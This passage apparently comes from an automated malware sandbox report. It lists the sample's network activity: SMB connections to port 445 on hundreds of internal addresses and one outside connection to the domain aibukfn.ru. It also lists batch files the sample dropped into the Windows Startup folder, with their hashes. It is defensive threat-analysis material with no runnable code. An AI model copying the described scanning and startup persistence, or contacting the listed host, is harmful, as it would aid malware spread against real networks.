| N/A | 10.127.4.73:445 | tcp | |
| N/A | 10.127.4.70:445 | tcp | |
| N/A | 10.127.4.72:445 | tcp | |
| N/A | 10.127.4.75:445 | tcp | |
| N/A | 10.127.4.76:445 | tcp | |
| N/A | 10.127.4.78:445 | tcp | |
| N/A | 10.127.4.68:445 | tcp | |
| N/A | 10.127.4.69:445 | tcp | |
| N/A | 10.127.4.97:445 | tcp | |
| N/A | 10.127.4.80:445 | tcp | |
| N/A | 10.127.4.112:445 | tcp | |
| N/A | 10.127.4.106:445 | tcp | |
| N/A | 10.127.4.95:445 | tcp | |
| N/A | 10.127.4.107:445 | tcp | |
| N/A | 10.127.4.98:445 | tcp | |
| N/A | 10.127.4.102:445 | tcp | |
| N/A | 10.127.4.90:445 | tcp | |
| N/A | 10.127.4.99:445 | tcp | |
| N/A | 10.127.4.110:445 | tcp | |
| N/A | 10.127.4.108:445 | tcp | |
| N/A | 10.127.4.101:445 | tcp | |
| N/A | 10.127.4.82:445 | tcp | |
| N/A | 10.127.4.113:445 | tcp | |
| N/A | 10.127.4.103:445 | tcp | |
| N/A | 10.127.4.93:445 | tcp | |
| N/A | 10.127.4.94:445 | tcp | |
| N/A | 10.127.4.105:445 | tcp | |
| N/A | 10.127.4.85:445 | tcp | |
| N/A | 10.127.4.114:445 | tcp | |
| N/A | 10.127.4.96:445 | tcp | |
| N/A | 10.127.4.92:445 | tcp | |
| N/A | 10.127.4.104:445 | tcp | |
| N/A | 10.127.4.118:445 | tcp | |
| N/A | 10.127.4.84:445 | tcp | |
| N/A | 10.127.4.91:445 | tcp | |
| N/A | 10.127.4.120:445 | tcp | |
| N/A | 10.127.4.79:445 | tcp | |
| N/A | 10.127.4.111:445 | tcp | |
| N/A | 10.127.4.81:445 | tcp | |
| N/A | 10.127.4.121:445 | tcp | |
| N/A | 10.127.4.86:445 | tcp | |
| N/A | 10.127.4.88:445 | tcp | |
| N/A | 10.127.4.116:445 | tcp | |
| N/A | 10.127.4.109:445 | tcp | |
| N/A | 10.127.4.89:445 | tcp | |
| N/A | 10.127.4.83:445 | tcp | |
| N/A | 10.127.4.100:445 | tcp | |
| N/A | 10.127.4.87:445 | tcp | |
| N/A | 10.127.4.128:445 | tcp | |
| N/A | 10.127.4.124:445 | tcp | |
| N/A | 10.127.4.125:445 | tcp | |
| N/A | 10.127.4.127:445 | tcp | |
| N/A | 10.127.4.122:445 | tcp | |
| N/A | 10.127.4.115:445 | tcp | |
| N/A | 10.127.4.117:445 | tcp | |
| N/A | 10.127.4.123:445 | tcp | |
| N/A | 10.127.4.126:445 | tcp | |
| N/A | 10.127.4.119:445 | tcp | |
| N/A | 10.127.4.139:445 | tcp | |
| N/A | 10.127.4.129:445 | tcp | |
| N/A | 10.127.4.141:445 | tcp | |
| N/A | 10.127.4.132:445 | tcp | |
| N/A | 10.127.4.140:445 | tcp | |
| N/A | 10.127.4.130:445 | tcp | |
| N/A | 10.127.4.138:445 | tcp | |
| N/A | 10.127.4.137:445 | tcp | |
| N/A | 10.127.4.135:445 | tcp | |
| N/A | 10.127.4.134:445 | tcp | |
| N/A | 10.127.4.131:445 | tcp | |
| N/A | 10.127.4.136:445 | tcp | |
| N/A | 10.127.4.142:445 | tcp | |
| N/A | 10.127.4.133:445 | tcp | |
| N/A | 10.127.4.160:445 | tcp | |
| N/A | 10.127.4.152:445 | tcp | |
| N/A | 10.127.4.173:445 | tcp | |
| N/A | 10.127.4.157:445 | tcp | |
| N/A | 10.127.4.175:445 | tcp | |
| N/A | 10.127.4.171:445 | tcp | |
| N/A | 10.127.4.143:445 | tcp | |
| N/A | 10.127.4.151:445 | tcp | |
| N/A | 10.127.4.172:445 | tcp | |
| N/A | 10.127.4.176:445 | tcp | |
| N/A | 10.127.4.153:445 | tcp | |
| N/A | 10.127.4.158:445 | tcp | |
| N/A | 10.127.4.155:445 | tcp | |
| N/A | 10.127.4.159:445 | tcp | |
| N/A | 10.127.4.145:445 | tcp | |
| N/A | 10.127.4.146:445 | tcp | |
| N/A | 10.127.4.161:445 | tcp | |
| N/A | 10.127.4.168:445 | tcp | |
| N/A | 10.127.4.150:445 | tcp | |
| N/A | 10.127.4.164:445 | tcp | |
| N/A | 10.127.4.165:445 | tcp | |
| N/A | 10.127.4.170:445 | tcp | |
| N/A | 10.127.4.174:445 | tcp | |
| N/A | 10.127.4.144:445 | tcp | |
| N/A | 10.127.4.182:445 | tcp | |
| N/A | 10.127.4.191:445 | tcp | |
| N/A | 10.127.4.192:445 | tcp | |
| N/A | 10.127.4.154:445 | tcp | |
| N/A | 10.127.4.162:445 | tcp | |
| N/A | 10.127.4.183:445 | tcp | |
| N/A | 10.127.4.186:445 | tcp | |
| N/A | 10.127.4.177:445 | tcp | |
| N/A | 10.127.4.148:445 | tcp | |
| N/A | 10.127.4.163:445 | tcp | |
| N/A | 10.127.4.147:445 | tcp | |
| N/A | 10.127.4.156:445 | tcp | |
| N/A | 10.127.4.166:445 | tcp | |
| N/A | 10.127.4.149:445 | tcp | |
| N/A | 10.127.4.169:445 | tcp | |
| N/A | 10.127.4.178:445 | tcp | |
| N/A | 10.127.4.167:445 | tcp | |
| N/A | 10.127.4.189:445 | tcp | |
| N/A | 10.127.4.185:445 | tcp | |
| N/A | 10.127.4.188:445 | tcp | |
| N/A | 10.127.4.179:445 | tcp | |
| N/A | 10.127.4.180:445 | tcp | |
| N/A | 10.127.4.184:445 | tcp | |
| N/A | 10.127.4.181:445 | tcp | |
| N/A | 10.127.4.187:445 | tcp | |
| N/A | 10.127.4.190:445 | tcp | |
| N/A | 10.127.4.194:445 | tcp | |
| N/A | 10.127.4.199:445 | tcp | |
| N/A | 10.127.4.200:445 | tcp | |
| N/A | 10.127.4.193:445 | tcp | |
| N/A | 10.127.4.202:445 | tcp | |
| N/A | 10.127.4.205:445 | tcp | |
| N/A | 10.127.4.204:445 | tcp | |
| N/A | 10.127.4.195:445 | tcp | |
| N/A | 10.127.4.196:445 | tcp | |
| N/A | 10.127.4.203:445 | tcp | |
| N/A | 10.127.4.201:445 | tcp | |
| N/A | 10.127.4.206:445 | tcp | |
| N/A | 10.127.4.197:445 | tcp | |
| N/A | 10.127.4.198:445 | tcp | |
| N/A | 10.127.4.217:445 | tcp | |
| N/A | 10.127.4.213:445 | tcp | |
| N/A | 10.127.4.229:445 | tcp | |
| N/A | 10.127.4.228:445 | tcp | |
| N/A | 10.127.4.236:445 | tcp | |
| N/A | 10.127.4.219:445 | tcp | |
| N/A | 10.127.4.210:445 | tcp | |
| N/A | 10.127.4.234:445 | tcp | |
| N/A | 10.127.4.222:445 | tcp | |
| N/A | 10.127.4.235:445 | tcp | |
| N/A | 10.127.4.233:445 | tcp | |
| N/A | 10.127.4.221:445 | tcp | |
| N/A | 10.127.4.240:445 | tcp | |
| N/A | 10.127.4.232:445 | tcp | |
| N/A | 10.127.4.218:445 | tcp | |
| N/A | 10.127.4.225:445 | tcp | |
| N/A | 10.127.4.247:445 | tcp | |
| N/A | 10.127.4.245:445 | tcp | |
| N/A | 10.127.4.255:445 | tcp | |
| N/A | 10.127.4.231:445 | tcp | |
| N/A | 10.127.4.226:445 | tcp | |
| N/A | 10.127.4.215:445 | tcp | |
| N/A | 10.127.4.207:445 | tcp | |
| N/A | 10.127.4.244:445 | tcp | |
| N/A | 10.127.4.212:445 | tcp | |
| N/A | 10.127.4.214:445 | tcp | |
| N/A | 10.127.4.216:445 | tcp | |
| N/A | 10.127.4.241:445 | tcp | |
| N/A | 10.127.4.238:445 | tcp | |
| N/A | 10.127.4.223:445 | tcp | |
| N/A | 10.127.4.208:445 | tcp | |
| N/A | 10.127.4.220:445 | tcp | |
| N/A | 10.127.4.239:445 | tcp | |
| N/A | 10.127.4.227:445 | tcp | |
| N/A | 10.127.4.252:445 | tcp | |
| N/A | 10.127.4.230:445 | tcp | |
| N/A | 10.127.4.249:445 | tcp | |
| N/A | 10.127.4.237:445 | tcp | |
| N/A | 10.127.4.242:445 | tcp | |
| N/A | 10.127.4.253:445 | tcp | |
| N/A | 10.127.4.211:445 | tcp | |
| N/A | 10.127.5.0:445 | tcp | |
| N/A | 10.127.4.209:445 | tcp | |
| N/A | 10.127.4.224:445 | tcp | |
| N/A | 10.127.4.243:445 | tcp | |
| N/A | 10.127.4.248:445 | tcp | |
| N/A | 10.127.4.254:445 | tcp | |
| N/A | 10.127.4.251:445 | tcp | |
| N/A | 10.127.4.246:445 | tcp | |
| N/A | 10.127.4.250:445 | tcp | |
| N/A | 10.127.5.10:445 | tcp | |
| N/A | 10.127.5.14:445 | tcp | |
| N/A | 10.127.5.8:445 | tcp | |
| N/A | 10.127.5.11:445 | tcp | |
| N/A | 10.127.5.12:445 | tcp | |
| N/A | 10.127.5.7:445 | tcp | |
| N/A | 10.127.5.13:445 | tcp | |
| N/A | 10.127.5.9:445 | tcp | |
| N/A | 10.127.5.5:445 | tcp | |
| N/A | 10.127.5.1:445 | tcp | |
| N/A | 10.127.5.6:445 | tcp | |
| N/A | 10.127.5.4:445 | tcp | |
| N/A | 10.127.5.3:445 | tcp | |
| N/A | 10.127.5.2:445 | tcp | |
| N/A | 10.127.5.18:445 | tcp | |
| N/A | 10.127.5.39:445 | tcp | |
| N/A | 10.127.5.46:445 | tcp | |
| N/A | 10.127.5.40:445 | tcp | |
| N/A | 10.127.5.56:445 | tcp | |
| N/A | 10.127.5.30:445 | tcp | |
| N/A | 10.127.5.21:445 | tcp | |
| N/A | 10.127.5.64:445 | tcp | |
| N/A | 10.127.5.61:445 | tcp | |
| N/A | 10.127.5.29:445 | tcp | |
| N/A | 10.127.5.55:445 | tcp | |
| N/A | 10.127.5.49:445 | tcp | |
| N/A | 10.127.5.36:445 | tcp | |
| N/A | 10.127.5.38:445 | tcp | |
| N/A | 10.127.5.62:445 | tcp | |
| N/A | 10.127.5.42:445 | tcp | |
| N/A | 10.127.5.50:445 | tcp | |
| N/A | 10.127.5.44:445 | tcp | |
| N/A | 10.127.5.20:445 | tcp | |
| N/A | 10.127.5.35:445 | tcp | |
| N/A | 10.127.5.16:445 | tcp | |
| N/A | 10.127.5.57:445 | tcp | |
| N/A | 10.127.5.45:445 | tcp | |
| N/A | 10.127.5.32:445 | tcp | |
| N/A | 10.127.5.47:445 | tcp | |
| N/A | 10.127.5.34:445 | tcp | |
| N/A | 10.127.5.31:445 | tcp | |
| N/A | 10.127.5.52:445 | tcp | |
| N/A | 10.127.5.63:445 | tcp | |
| N/A | 10.127.5.25:445 | tcp | |
| N/A | 10.127.5.17:445 | tcp | |
| N/A | 10.127.5.22:445 | tcp | |
| N/A | 10.127.5.27:445 | tcp | |
| N/A | 10.127.5.43:445 | tcp | |
| N/A | 10.127.5.37:445 | tcp | |
| N/A | 10.127.5.51:445 | tcp | |
| N/A | 10.127.5.33:445 | tcp | |
| N/A | 10.127.5.15:445 | tcp | |
| N/A | 10.127.5.59:445 | tcp | |
| N/A | 10.127.5.48:445 | tcp | |
| N/A | 10.127.5.23:445 | tcp | |
| N/A | 10.127.5.24:445 | tcp | |
| N/A | 10.127.5.26:445 | tcp | |
| N/A | 10.127.5.60:445 | tcp | |
| N/A | 10.127.5.28:445 | tcp | |
| N/A | 10.127.5.41:445 | tcp | |
| N/A | 10.127.5.58:445 | tcp | |
| N/A | 10.127.5.19:445 | tcp | |
| N/A | 10.127.5.54:445 | tcp | |
| N/A | 10.127.5.53:445 | tcp | |
| N/A | 10.127.5.70:445 | tcp | |
| N/A | 10.127.5.72:445 | tcp | |
| N/A | 10.127.5.75:445 | tcp | |
| N/A | 10.127.5.65:445 | tcp | |
| N/A | 10.127.5.68:445 | tcp | |
| N/A | 10.127.5.66:445 | tcp | |
| N/A | 10.127.5.78:445 | tcp | |
| N/A | 10.127.5.73:445 | tcp | |
| N/A | 10.127.5.77:445 | tcp | |
| N/A | 10.127.5.74:445 | tcp | |
| N/A | 10.127.5.69:445 | tcp | |
| N/A | 10.127.5.71:445 | tcp | |
| N/A | 10.127.5.67:445 | tcp | |
| N/A | 10.127.5.76:445 | tcp | |
| N/A | 10.127.5.94:445 | tcp | |
| N/A | 10.127.5.99:445 | tcp | |
| N/A | 10.127.5.83:445 | tcp | |
| N/A | 10.127.5.91:445 | tcp | |
| N/A | 10.127.5.101:445 | tcp | |
| N/A | 10.127.5.117:445 | tcp | |
| N/A | 10.127.5.113:445 | tcp | |
| N/A | 10.127.5.104:445 | tcp | |
| N/A | 10.127.5.93:445 | tcp | |
| N/A | 10.127.5.79:445 | tcp | |
| N/A | 10.127.5.98:445 | tcp | |
| N/A | 10.127.5.128:445 | tcp | |
| N/A | 10.127.5.125:445 | tcp | |
| N/A | 10.127.5.118:445 | tcp | |
| N/A | 10.127.5.96:445 | tcp | |
| N/A | 10.127.5.85:445 | tcp | |
| N/A | 10.127.5.97:445 | tcp | |
| N/A | 10.127.5.106:445 | tcp | |
| N/A | 10.127.5.127:445 | tcp | |
| N/A | 10.127.5.112:445 | tcp | |
| N/A | 10.127.5.87:445 | tcp | |
| N/A | 10.127.5.120:445 | tcp | |
| N/A | 10.127.5.80:445 | tcp | |
| N/A | 10.127.5.119:445 | tcp | |
| N/A | 10.127.5.122:445 | tcp | |
| N/A | 10.127.5.89:445 | tcp | |
| N/A | 10.127.5.114:445 | tcp | |
| N/A | 10.127.5.102:445 | tcp | |
| N/A | 10.127.5.115:445 | tcp | |
| N/A | 10.127.5.88:445 | tcp | |
| N/A | 10.127.5.116:445 | tcp | |
| N/A | 10.127.5.82:445 | tcp | |
| N/A | 10.127.5.105:445 | tcp | |
| N/A | 10.127.5.95:445 | tcp | |
| N/A | 10.127.5.108:445 | tcp | |
| N/A | 10.127.5.84:445 | tcp | |
| N/A | 10.127.5.103:445 | tcp | |
| N/A | 10.127.5.90:445 | tcp | |
| N/A | 10.127.5.124:445 | tcp | |
| N/A | 10.127.5.86:445 | tcp | |
| N/A | 10.127.5.92:445 | tcp | |
| N/A | 10.127.5.107:445 | tcp | |
| N/A | 10.127.5.81:445 | tcp | |
| N/A | 10.127.5.123:445 | tcp | |
| N/A | 10.127.5.111:445 | tcp | |
| N/A | 10.127.5.109:445 | tcp | |
| N/A | 10.127.5.100:445 | tcp | |
| N/A | 10.127.5.121:445 | tcp | |
| N/A | 10.127.5.126:445 | tcp | |
| N/A | 10.127.5.110:445 | tcp | |
| TR | 195.16.74.230:80 | aibukfn.ru | tcp |
| N/A | 10.127.5.135:445 | tcp | |
| N/A | 10.127.5.130:445 | tcp | |
| N/A | 10.127.5.137:445 | tcp | |
| N/A | 10.127.5.136:445 | tcp | |
| N/A | 10.127.5.139:445 | tcp | |
| N/A | 10.127.5.138:445 | tcp | |
| N/A | 10.127.5.142:445 | tcp | |
| N/A | 10.127.5.134:445 | tcp | |
| N/A | 10.127.5.140:445 | tcp | |
| N/A | 10.127.5.132:445 | tcp | |
| N/A | 10.127.5.131:445 | tcp | |
| N/A | 10.127.5.141:445 | tcp | |
| N/A | 10.127.5.129:445 | tcp | |
| N/A | 10.127.5.133:445 | tcp | |
| N/A | 10.127.5.164:445 | tcp | |
| N/A | 10.127.5.191:445 | tcp | |
| N/A | 10.127.5.145:445 | tcp | |
| N/A | 10.127.5.170:445 | tcp | |
| N/A | 10.127.5.174:445 | tcp | |
| N/A | 10.127.5.166:445 | tcp | |
| N/A | 10.127.5.185:445 | tcp | |
| N/A | 10.127.5.183:445 | tcp | |
| N/A | 10.127.5.172:445 | tcp | |
| N/A | 10.127.5.148:445 | tcp | |
| N/A | 10.127.5.151:445 | tcp | |
| N/A | 10.127.5.159:445 | tcp | |
| N/A | 10.127.5.178:445 | tcp | |
| N/A | 10.127.5.167:445 | tcp | |
| N/A | 10.127.5.150:445 | tcp | |
| N/A | 10.127.5.186:445 | tcp | |
| N/A | 10.127.5.163:445 | tcp | |
| N/A | 10.127.5.165:445 | tcp | |
| N/A | 10.127.5.175:445 | tcp | |
| N/A | 10.127.5.177:445 | tcp | |
| N/A | 10.127.5.182:445 | tcp | |
| N/A | 10.127.5.187:445 | tcp | |
| N/A | 10.127.5.158:445 | tcp | |
| N/A | 10.127.5.180:445 | tcp | |
| N/A | 10.127.5.181:445 | tcp | |
| N/A | 10.127.5.147:445 | tcp | |
| N/A | 10.127.5.154:445 | tcp | |
| N/A | 10.127.5.169:445 | tcp | |
| N/A | 10.127.5.192:445 | tcp | |
| N/A | 10.127.5.146:445 | tcp | |
| N/A | 10.127.5.188:445 | tcp | |
| N/A | 10.127.5.176:445 | tcp | |
| N/A | 10.127.5.157:445 | tcp | |
| N/A | 10.127.5.143:445 | tcp | |
| N/A | 10.127.5.190:445 | tcp | |
| N/A | 10.127.5.179:445 | tcp | |
| N/A | 10.127.5.161:445 | tcp | |
| N/A | 10.127.5.189:445 | tcp | |
| N/A | 10.127.5.156:445 | tcp | |
| N/A | 10.127.5.184:445 | tcp | |
| N/A | 10.127.5.144:445 | tcp | |
| N/A | 10.127.5.171:445 | tcp | |
| N/A | 10.127.5.168:445 | tcp | |
| N/A | 10.127.5.153:445 | tcp | |
| N/A | 10.127.5.160:445 | tcp | |
| N/A | 10.127.5.152:445 | tcp | |
| N/A | 10.127.5.155:445 | tcp | |
| N/A | 10.127.5.149:445 | tcp | |
| N/A | 10.127.5.162:445 | tcp | |
| N/A | 10.127.5.173:445 | tcp | |
| N/A | 10.127.5.204:445 | tcp | |
| N/A | 10.127.5.205:445 | tcp | |
| N/A | 10.127.5.201:445 | tcp | |
| N/A | 10.127.5.202:445 | tcp | |
| N/A | 10.127.5.193:445 | tcp | |
| N/A | 10.127.5.203:445 | tcp | |
| N/A | 10.127.5.206:445 | tcp | |
| N/A | 10.127.5.195:445 | tcp | |
| N/A | 10.127.5.199:445 | tcp | |
| N/A | 10.127.5.227:445 | tcp | |
| N/A | 10.127.5.235:445 | tcp | |
| N/A | 10.127.5.240:445 | tcp | |
| N/A | 10.127.5.250:445 | tcp | |
| N/A | 10.127.5.242:445 | tcp | |
| N/A | 10.127.5.232:445 | tcp | |
| N/A | 10.127.5.233:445 | tcp | |
| N/A | 10.127.5.231:445 | tcp | |
| N/A | 10.127.5.246:445 | tcp | |
| N/A | 10.127.5.214:445 | tcp | |
| N/A | 10.127.5.200:445 | tcp | |
| N/A | 10.127.5.255:445 | tcp | |
| N/A | 10.127.5.239:445 | tcp | |
| N/A | 10.127.5.208:445 | tcp | |
| N/A | 10.127.5.222:445 | tcp | |
| N/A | 10.127.5.219:445 | tcp | |
| N/A | 10.127.5.236:445 | tcp | |
| N/A | 10.127.5.245:445 | tcp | |
| N/A | 10.127.5.196:445 | tcp | |
| N/A | 10.127.5.198:445 | tcp | |
| N/A | 10.127.5.197:445 | tcp | |
| N/A | 10.127.5.225:445 | tcp | |
| N/A | 10.127.5.243:445 | tcp | |
| N/A | 10.127.5.209:445 | tcp | |
| N/A | 10.127.5.212:445 | tcp | |
| N/A | 10.127.5.194:445 | tcp | |
| N/A | 10.127.5.217:445 | tcp | |
| N/A | 10.127.5.218:445 | tcp | |
| N/A | 10.127.5.241:445 | tcp | |
| N/A | 10.127.5.234:445 | tcp | |
| N/A | 10.127.5.237:445 | tcp | |
| N/A | 10.127.5.211:445 | tcp | |
| N/A | 10.127.5.213:445 | tcp | |
| N/A | 10.127.5.249:445 | tcp | |
| N/A | 10.127.5.216:445 | tcp | |
| N/A | 10.127.5.247:445 | tcp | |
| N/A | 10.127.5.251:445 | tcp | |
| N/A | 10.127.5.224:445 | tcp | |
| N/A | 10.127.5.252:445 | tcp | |
| N/A | 10.127.5.254:445 | tcp | |
| N/A | 10.127.5.207:445 | tcp | |
| N/A | 10.127.5.223:445 | tcp | |
| N/A | 10.127.5.253:445 | tcp | |
| N/A | 10.127.5.248:445 | tcp | |
| N/A | 10.127.5.221:445 | tcp | |
| N/A | 10.127.5.244:445 | tcp | |
| N/A | 10.127.5.220:445 | tcp | |
| N/A | 10.127.5.230:445 | tcp | |
| N/A | 10.127.5.226:445 | tcp | |
| N/A | 10.127.5.238:445 | tcp | |
| N/A | 10.127.5.228:445 | tcp | |
| N/A | 10.127.6.0:445 | tcp | |
| N/A | 10.127.5.229:445 | tcp | |
| N/A | 10.127.5.210:445 | tcp | |
| N/A | 10.127.5.215:445 | tcp | |
| N/A | 10.127.6.13:445 | tcp | |
| N/A | 10.127.6.4:445 | tcp | |
| N/A | 10.127.6.1:445 | tcp | |
| N/A | 10.127.6.9:445 | tcp | |
| N/A | 10.127.6.11:445 | tcp | |
| N/A | 10.127.6.12:445 | tcp | |
| N/A | 10.127.6.10:445 | tcp | |
| N/A | 10.127.6.7:445 | tcp | |
| N/A | 10.127.6.3:445 | tcp | |
| N/A | 10.127.6.49:445 | tcp | |
| N/A | 10.127.6.24:445 | tcp | |
| N/A | 10.127.6.39:445 | tcp | |
| N/A | 10.127.6.58:445 | tcp | |
| N/A | 10.127.6.31:445 | tcp | |
| N/A | 10.127.6.61:445 | tcp | |
| N/A | 10.127.6.38:445 | tcp | |
| N/A | 10.127.6.51:445 | tcp | |
| N/A | 10.127.6.57:445 | tcp | |
| N/A | 10.127.6.35:445 | tcp | |
| N/A | 10.127.6.44:445 | tcp | |
| N/A | 10.127.6.14:445 | tcp | |
| N/A | 10.127.6.6:445 | tcp | |
| N/A | 10.127.6.56:445 | tcp | |
| N/A | 10.127.6.43:445 | tcp | |
| N/A | 10.127.6.8:445 | tcp | |
| N/A | 10.127.6.64:445 | tcp | |
| N/A | 10.127.6.19:445 | tcp | |
| N/A | 10.127.6.55:445 | tcp | |
| N/A | 10.127.6.2:445 | tcp | |
| N/A | 10.127.6.50:445 | tcp | |
| N/A | 10.127.6.53:445 | tcp | |
| N/A | 10.127.6.5:445 | tcp | |
| N/A | 10.127.6.42:445 | tcp | |
| N/A | 10.127.6.62:445 | tcp | |
| N/A | 10.127.6.15:445 | tcp | |
| N/A | 10.127.6.21:445 | tcp | |
| N/A | 10.127.6.54:445 | tcp | |
| N/A | 10.127.6.23:445 | tcp | |
| N/A | 10.127.6.40:445 | tcp | |
| N/A | 10.127.6.22:445 | tcp | |
| N/A | 10.127.6.30:445 | tcp | |
| N/A | 10.127.6.28:445 | tcp | |
| N/A | 10.127.6.46:445 | tcp | |
| N/A | 10.127.6.18:445 | tcp | |
| N/A | 10.127.6.37:445 | tcp | |
| N/A | 10.127.6.59:445 | tcp | |
| N/A | 10.127.6.32:445 | tcp | |
| N/A | 10.127.6.36:445 | tcp | |
| N/A | 10.127.6.26:445 | tcp | |
| N/A | 10.127.6.25:445 | tcp | |
| N/A | 10.127.6.60:445 | tcp | |
| N/A | 10.127.6.45:445 | tcp | |
| N/A | 10.127.6.27:445 | tcp | |
| N/A | 10.127.6.41:445 | tcp | |
| N/A | 10.127.6.52:445 | tcp | |
| N/A | 10.127.6.34:445 | tcp | |
| N/A | 10.127.6.63:445 | tcp | |
| N/A | 10.127.6.17:445 | tcp | |
| N/A | 10.127.6.47:445 | tcp | |
| N/A | 10.127.6.33:445 | tcp | |
| N/A | 10.127.6.29:445 | tcp | |
| N/A | 10.127.6.16:445 | tcp | |
| N/A | 10.127.6.20:445 | tcp | |
| N/A | 10.127.6.48:445 | tcp | |
| N/A | 10.127.6.77:445 | tcp | |
| N/A | 10.127.6.73:445 | tcp | |
| N/A | 10.127.6.70:445 | tcp | |
| N/A | 10.127.6.76:445 | tcp | |
| N/A | 10.127.6.78:445 | tcp | |
| N/A | 10.127.6.66:445 | tcp | |
| N/A | 10.127.6.90:445 | tcp | |
| N/A | 10.127.6.117:445 | tcp | |
| N/A | 10.127.6.107:445 | tcp | |
| N/A | 10.127.6.110:445 | tcp | |
| N/A | 10.127.6.92:445 | tcp | |
| N/A | 10.127.6.83:445 | tcp | |
| N/A | 10.127.6.84:445 | tcp | |
| N/A | 10.127.6.79:445 | tcp | |
| N/A | 10.127.6.93:445 | tcp | |
| N/A | 10.127.6.99:445 | tcp | |
| N/A | 10.127.6.100:445 | tcp | |
| N/A | 10.127.6.109:445 | tcp | |
| N/A | 10.127.6.126:445 | tcp | |
| N/A | 10.127.6.106:445 | tcp | |
| N/A | 10.127.6.121:445 | tcp | |
| N/A | 10.127.6.98:445 | tcp | |
| N/A | 10.127.6.97:445 | tcp | |
| N/A | 10.127.6.125:445 | tcp | |
| N/A | 10.127.6.120:445 | tcp | |
| N/A | 10.127.6.87:445 | tcp | |
| N/A | 10.127.6.112:445 | tcp | |
| N/A | 10.127.6.124:445 | tcp | |
| N/A | 10.127.6.88:445 | tcp | |
| N/A | 10.127.6.101:445 | tcp | |
| N/A | 10.127.6.81:445 | tcp | |
| N/A | 10.127.6.115:445 | tcp | |
| N/A | 10.127.6.122:445 | tcp | |
| N/A | 10.127.6.103:445 | tcp | |
| N/A | 10.127.6.104:445 | tcp | |
| N/A | 10.127.6.74:445 | tcp | |
| N/A | 10.127.6.114:445 | tcp | |
| N/A | 10.127.6.95:445 | tcp | |
| N/A | 10.127.6.71:445 | tcp | |
| N/A | 10.127.6.69:445 | tcp | |
| N/A | 10.127.6.105:445 | tcp | |
| N/A | 10.127.6.82:445 | tcp | |
| N/A | 10.127.6.96:445 | tcp | |
| N/A | 10.127.6.102:445 | tcp | |
| N/A | 10.127.6.119:445 | tcp | |
| N/A | 10.127.6.128:445 | tcp | |
| N/A | 10.127.6.94:445 | tcp | |
| N/A | 10.127.6.89:445 | tcp | |
| N/A | 10.127.6.67:445 | tcp | |
| N/A | 10.127.6.118:445 | tcp | |
| N/A | 10.127.6.80:445 | tcp | |
| N/A | 10.127.6.91:445 | tcp | |
| N/A | 10.127.6.86:445 | tcp | |
| N/A | 10.127.6.113:445 | tcp | |
| N/A | 10.127.6.127:445 | tcp | |
| N/A | 10.127.6.75:445 | tcp | |
| N/A | 10.127.6.85:445 | tcp | |
| N/A | 10.127.6.116:445 | tcp | |
| N/A | 10.127.6.111:445 | tcp | |
| N/A | 10.127.6.123:445 | tcp | |
| N/A | 10.127.6.108:445 | tcp | |
| N/A | 10.127.6.65:445 | tcp | |
| N/A | 10.127.6.68:445 | tcp | |
| N/A | 10.127.6.72:445 | tcp | |
| N/A | 10.127.6.137:445 | tcp | |
| N/A | 10.127.6.133:445 | tcp | |
| N/A | 10.127.6.140:445 | tcp | |
| N/A | 10.127.6.131:445 | tcp | |
| N/A | 10.127.6.142:445 | tcp | |
| N/A | 10.127.6.135:445 | tcp | |
| N/A | 10.127.6.130:445 | tcp | |
| N/A | 10.127.6.136:445 | tcp | |
| N/A | 10.127.6.132:445 | tcp | |
| N/A | 10.127.6.134:445 | tcp | |
| N/A | 10.127.6.139:445 | tcp | |
| N/A | 10.127.6.153:445 | tcp | |
| N/A | 10.127.6.169:445 | tcp | |
| N/A | 10.127.6.129:445 | tcp | |
| N/A | 10.127.6.138:445 | tcp | |
| N/A | 10.127.6.149:445 | tcp | |
| N/A | 10.127.6.148:445 | tcp | |
| N/A | 10.127.6.156:445 | tcp | |
| N/A | 10.127.6.177:445 | tcp | |
| N/A | 10.127.6.182:445 | tcp | |
| N/A | 10.127.6.141:445 | tcp | |
| N/A | 10.127.6.151:445 | tcp | |
| N/A | 10.127.6.155:445 | tcp | |
| N/A | 10.127.6.181:445 | tcp | |
| N/A | 10.127.6.164:445 | tcp | |
| N/A | 10.127.6.167:445 | tcp | |
| N/A | 10.127.6.183:445 | tcp | |
| N/A | 10.127.6.184:445 | tcp | |
| N/A | 10.127.6.173:445 | tcp | |
| N/A | 10.127.6.146:445 | tcp | |
| N/A | 10.127.6.158:445 | tcp | |
| N/A | 10.127.6.159:445 | tcp | |
| N/A | 10.127.6.174:445 | tcp |
Files
memory/2428-0-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-1-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-2-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-6-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-7-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-8-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-11-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-10-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-9-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/2428-12-0x0000018A16200000-0x0000018A16201000-memory.dmp
memory/5724-14-0x0000000000400000-0x0000000000408000-memory.dmp
memory/5724-15-0x0000000074AB0000-0x0000000075260000-memory.dmp
memory/5724-16-0x0000000005250000-0x0000000005260000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat
| MD5 | 60159e8f2e56c15793b4dc44ddb8da0d |
| SHA1 | c23fd4a88bf4e329c88bf1266e46d5f231fd1873 |
| SHA256 | fc6b5481f6b2ee09a07a6983aa7f4eec978815552f6ba2f7024d02cc37bf577a |
| SHA512 | f16db3e564591f181cd8b377d95a299110bbbe1c33f577141c038d5bc82562a9103c636efaf0c0b976e9e1a7b0b35b066ff48750098613f10c160b3b1e25b8c0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat
| MD5 | 035d24297bdff3dc0c13784fd84c65ae |
| SHA1 | f8a5841212cd7eb6dfd5505ff91da5f9c9cb96e7 |
| SHA256 | 6eeba4ac4373f638199ab856ba7c6a110fa5ae15f452ff6f2c28965f9822d676 |
| SHA512 | 0a6c47d712bf1a5adb8ba56b93ebbde4878985db2d9f411083d80030ef80b36b53faf49c462482d99d6d7daf567a2ab63da77613c50969963320b982b60b8288 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat
